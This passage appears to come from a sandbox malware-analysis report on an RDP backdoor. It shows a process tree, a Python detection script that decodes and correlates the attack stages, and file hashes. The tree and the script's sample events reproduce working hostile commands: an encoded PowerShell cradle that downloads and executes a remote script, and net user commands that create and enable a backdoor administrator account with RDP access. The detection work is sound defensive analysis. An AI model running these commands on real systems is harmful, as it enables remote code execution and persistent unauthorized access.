      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      PID 2096
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        PID 3920; flags: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
    PID 2792
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc 111213
      PID 3840
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 111213
        PID 3864
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc /active:yes
      PID 2784
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc /active:yes
        PID 3032
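Read as a whole, the tree above is an RDP backdoor install rather than a set of unrelated signatures: the first PowerShell stage swaps the ServiceDLL of TermService for the dropped, UPX-packed C:\Windows\branding\mediasrv.png, moves the RDP listener to port 0x1C21 (7201), turns off the WDDM driver policy for Terminal Services, adds NT AUTHORITY\NETWORK SERVICE to Administrators, then starts rdpdr and TermService; separate roots create the local account WgaUtilAcc (later re-passworded to 111213 and activated), add it and GFBFPSXA$ to Remote Desktop Users, add WgaUtilAcc to Administrators, fingerprint the GPU and CPU through wmic, and fetch speed.ps1 through an encoded PowerShell command. The following is an added example, not part of the sandbox report: detection logic in Python that runs over a constructed list of (pid, command line) events copied from the tree (a live feed would be Sysmon event 1 or Security event 4688), decodes the -enc payload, and correlates the distinct stages into one verdict. Rule names and the chain threshold are my own choices.

```python
import base64
import binascii
import re

# The base64 (UTF-16LE) blob from the "powershell ... -enc" command lines above (PID 3920).
ENCODED_BLOB = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Constructed sample feed: (pid, command line) pairs copied from the process tree above.
SAMPLE_EVENTS = [
    (3144, '"powershell.exe" -ep bypass & \'C:\\Users\\Admin\\AppData\\Local\\Temp\\\\ready.ps1\''),
    (3560, r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'),
    (1592, r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'),
    (2776, r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'),
    (2172, r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'),
    (2476, "net.exe user WgaUtilAcc 1fp0fXTo /add"),
    (4044, 'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD'),
    (3156, 'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD'),
    (2784, "net user wgautilacc /active:yes"),
    (3920, "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENCODED_BLOB),
    (2244, "wmic path win32_VideoController get name"),  # inventory query: no rule should fire
]

# The only legitimate ServiceDLL for TermService; anything else is a hijack.
LEGIT_TERMSRV = re.compile(r"^(?:%systemroot%|c:\\windows)\\system32\\termsrv\.dll$", re.I)
NET_EXE = re.compile(r'(?:^|[\\\s"])net(?:1|\.exe)?"?\s', re.I)
CHAIN_TAGS = {"rdp_port_change", "termservice_servicedll_hijack", "rdp_user_added",
              "local_admin_added", "local_account_created"}


def _find_encoded_blob(cmdline):
    """Argument following any abbreviation PowerShell accepts for -EncodedCommand (-e, -ec, -enc, ...)."""
    toks = cmdline.split()
    for i in range(len(toks) - 1):
        flag = toks[i].lower()
        if len(flag) > 1 and flag[0] == "-" and "encodedcommand".startswith(flag[1:]):
            return toks[i + 1]
    return None


def decode_encoded_command(cmdline):
    """Decode a -enc payload (base64 of UTF-16LE); None when absent or not decodable."""
    blob = _find_encoded_blob(cmdline)
    if blob is None:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _switch_value(cmdline, switch):
    """Argument after a reg.exe switch such as /v or /d, quoted or bare; None if absent."""
    m = re.search(re.escape(switch) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))


def classify(cmdline):
    """Return (tag, detail) pairs for one command line; an empty list means nothing fired."""
    hits, low = [], cmdline.lower()
    if "reg.exe" in low or low.startswith("reg "):
        name = (_switch_value(cmdline, "/v") or "").lower()
        data = _switch_value(cmdline, "/d") or ""
        if "\\rdp-tcp" in low and name == "portnumber":
            hits.append(("rdp_port_change", int(data, 0)))  # reg accepts 0x-prefixed hex
        if "services\\termservice\\parameters" in low and name == "servicedll" and not LEGIT_TERMSRV.match(data):
            hits.append(("termservice_servicedll_hijack", data))
        if name == "fenablewddmdriver" and data == "0":
            hits.append(("rdp_wddm_driver_disabled", data))
    if NET_EXE.search(cmdline):
        m = re.search(r'localgroup\s+"?(administrators|remote desktop users)"?\s+(?:"([^"]+)"|(\S+))\s+/add', cmdline, re.I)
        if m:
            member = m.group(2) if m.group(2) is not None else m.group(3)
            hits.append(("local_admin_added" if m.group(1).lower() == "administrators" else "rdp_user_added", member))
        m = re.search(r"\buser\s+(\S+)\s+(\S+)\s+/add\b", cmdline, re.I)
        if m:
            hits.append(("local_account_created", m.group(1)))
        m = re.search(r"\buser\s+(\S+)\s+/active:yes\b", cmdline, re.I)
        if m:
            hits.append(("account_enabled", m.group(1)))
    if "powershell" in low or "pwsh" in low:
        m = re.search(r"-e(?:p|x[a-z]*)\s+bypass", cmdline, re.I)
        if m:
            hits.append(("execution_policy_bypass", m.group(0)))
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            url = re.search(r'''https?://\S+?(?=["')\s]|$)''', decoded)
            cradle = re.search(r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", decoded, re.I)
            hits.append(("encoded_download_cradle", url.group(0)) if url and cradle else ("encoded_command", decoded[:60]))
    return hits


def scan(events):
    """Map pid -> hits for every event that triggered at least one rule."""
    out = {}
    for pid, cmdline in events:
        hits = classify(cmdline)
        if hits:
            out.setdefault(pid, []).extend(hits)
    return out


def is_rdp_backdoor_chain(events, threshold=3):
    """True when at least `threshold` distinct RDP-enablement stages occur in the event window."""
    seen = {tag for hits in scan(events).values() for tag, _ in hits}
    return len(seen & CHAIN_TAGS) >= threshold


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        for tag, detail in hits:
            print(f"pid {pid}: {tag} -> {detail}")
    print("RDP backdoor chain:", is_rdp_backdoor_chain(SAMPLE_EVENTS))
```

Two points matter when moving this to real telemetry. Correlate on a host and time window, not on pid: the report itself reuses 732, 2484, 2784 and 3560 for unrelated processes, so a pid-keyed join would merge a PowerShell job host with a cmd.exe. And the ServiceDLL rule is the high-confidence one: on a clean host HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDLL is %SystemRoot%\System32\termsrv.dll, so any other path (here a .png under C:\Windows\branding) is actionable on its own, while the net.exe rules are noisy on admin workstations and earn their weight only in combination.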
Network
MITRE ATT&CK Enterprise v6
Downloads
1.
  MD5: d20863fa6b0378e7daaec2b72d33aed3
  SHA1: 106e22bc3740f508141d43cf1b0bbe9a8ac31b7e
  SHA256: 98ecd1e7e1bc753350908682b9d5b01f615cacc54a8799b5d74f26c0b7adf4ac
  SHA512: 1448ac20f4037cadd812f6065436d8eca3229b91dc4e690a9a6eb2d9b1d7d680d268ff408a0492124cb4d8a8030fb494f256f3878de578286e66c591be315d7c
2.
  MD5: 8d61eb01ab6c18cc3c251984818fbfb2
  SHA1: b94e390db6e40554412857a7b38ed75d8a4d9087
  SHA256: f4cf621f55893c4f6b72f9cfd4d6a2bb2e4538cdfb9c4d576a2ab68057f0cae7
  SHA512: e3f1365afc45825e872852297dbf9a4c6d555e9fdda9b0592c6ee0b64ac61c3e1a23501416a20334bde407a292857840f265cc03ab146ffa69ea020bc82e3f45
3.
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
4.
  MD5: 00fb904b2dd958760943b89400e9b7f9
  SHA1: 8c825862b6f70cbaef991525f31100f713e61e7d
  SHA256: 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
  SHA512: ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
5.
  MD5: 3673bdfd482ecb3c60847ba43dc03365
  SHA1: ed52d2eb389812ee0b2cb3c38fb3aa1e913b3573
  SHA256: 50d46724a8ad6c9437ca7259e7cf9468819fc934a2bf667e2d3adcb255ed7e40
  SHA512: 75cfd122c20a19b590584351166ffb645cc4280555785d89b97d27ba0b796c3e45893df758c69e0a3eb412f32b5b363c6d2f9a122ecd38f06164aaf7a6068cbe
6.
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
7.
  MD5: d2198ed3f1bd7df8a4f8a7e11fc29f3f
  SHA1: 700fba90c732dd00c201ab9845a62c1623227632
  SHA256: c7abf2dfd55f3dae12b2d788e293935425e30f7b4f1fe47fb8f38edcec48c6cf
  SHA512: fd4173b651a2f1c08533fac77dae2ffcf67ea1dfe3cadacf5da498dfd5d80f26be807346c1acd0e12a6fe6bf18ac5fe89f5594d86f4bf4529af639a9c46fbd47
8.
  MD5: b110f38845e18a04ab59a7d8a134ef40
  SHA1: 8119030034e6fbe62d875e824b5233c1f29d61a0
  SHA256: 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
  SHA512: 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
9.
  MD5: 5768a809b9fcbff117dffa8cbf2e8852
  SHA1: a056e76d15bc7509d0361175b2ae4ba348460cd6
  SHA256: 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
  SHA512: 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b